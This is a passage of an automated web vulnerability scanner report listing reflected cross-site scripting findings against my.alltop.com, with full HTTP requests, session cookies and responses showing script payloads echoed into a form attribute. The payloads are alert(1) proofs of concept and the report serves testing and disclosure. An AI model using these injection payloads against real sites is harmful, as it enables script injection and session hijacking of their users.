Date: Tue, 08 Mar 2011 20:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a71875"><script>alert(1)</script>7227e96d4de" method="post" accept-charset="utf-8">
...[SNIP]...

1.29. http://my.alltop.com/alpha/a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5daa7"><script>alert(1)</script>14790842cfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?5daa7"><script>alert(1)</script>14790842cfc=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a?5daa7"><script>alert(1)</script>14790842cfc=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.30. http://my.alltop.com/alpha/a [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acba7"><script>alert(1)</script>6398c96cf08 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000C1)%3C/script%3Eacba7"><script>alert(1)</script>6398c96cf08 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:26 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:28 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:28 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000C1)%3C/script%3Eacba7"><script>alert(1)</script>6398c96cf08" method="post" accept-charset="utf-8">
...[SNIP]...

1.31. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2022f"><script>alert(1)</script>92138bbe86c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C2022f"><script>alert(1)</script>92138bbe86c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C2022f"><script>alert(1)</script>92138bbe86c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.32. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26c01"><script>alert(1)</script>5a0a4519285 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C26c01"><script>alert(1)</script>5a0a4519285/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C26c01"><script>alert(1)</script>5a0a4519285/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.33. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fba"><script>alert(1)</script>8caff67b2a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3Cc1fba"><script>alert(1)</script>8caff67b2a2/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3Cc1fba"><script>alert(1)</script>8caff67b2a2/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.34. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b57fa"><script>alert(1)</script>abd846000b9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3Eb57fa"><script>alert(1)</script>abd846000b9 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3Eb57fa"><script>alert(1)</script>abd846000b9" method="post" accept-charset="utf-8">
...[SNIP]...

1.35. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41627"><script>alert(1)</script>5b40a6159cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E?41627"><script>alert(1)</script>5b40a6159cf=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E?41627"><script>alert(1)</script>5b40a6159cf=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.36. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%22ns=%22netsparker(0x00011B)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be629"><script>alert(1)</script>f2ad206645 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/abe629"><script>alert(1)</script>f2ad206645/%22ns=%22netsparker(0x00011B) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
